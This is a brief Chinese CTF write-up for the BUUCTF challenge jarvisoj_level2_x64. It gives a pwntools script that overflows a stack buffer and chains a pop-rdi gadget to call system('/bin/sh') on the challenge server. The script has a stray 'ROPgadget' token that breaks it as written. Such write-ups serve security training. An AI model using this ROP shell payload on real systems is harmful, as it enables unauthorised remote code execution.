BUUCTF—jarvisoj_level2_x64
先看看开了什么保护机制

打开64位ida看看

就是一个很明显的栈溢出,再去看看有没有后门函数


虽然没有后门函数,但是system和binsh都找到了,所以我们再去找pop_rdi就可以了

这样exp就出来了
from pwn import*
p=remote('node4.buuoj.cn',26489)
binsh=0x600a90
system=0x4004c0
pop_rdi=0x4006b3
ret=0x4004a1
p.recvuntil('Input:\n')
payload=b'a'*0x88+p64(pop_rdi)+p64(binsh)+p64(system)
p.sendline(payload)ROPgadget
p.interactive()

浙公网安备 33010602011771号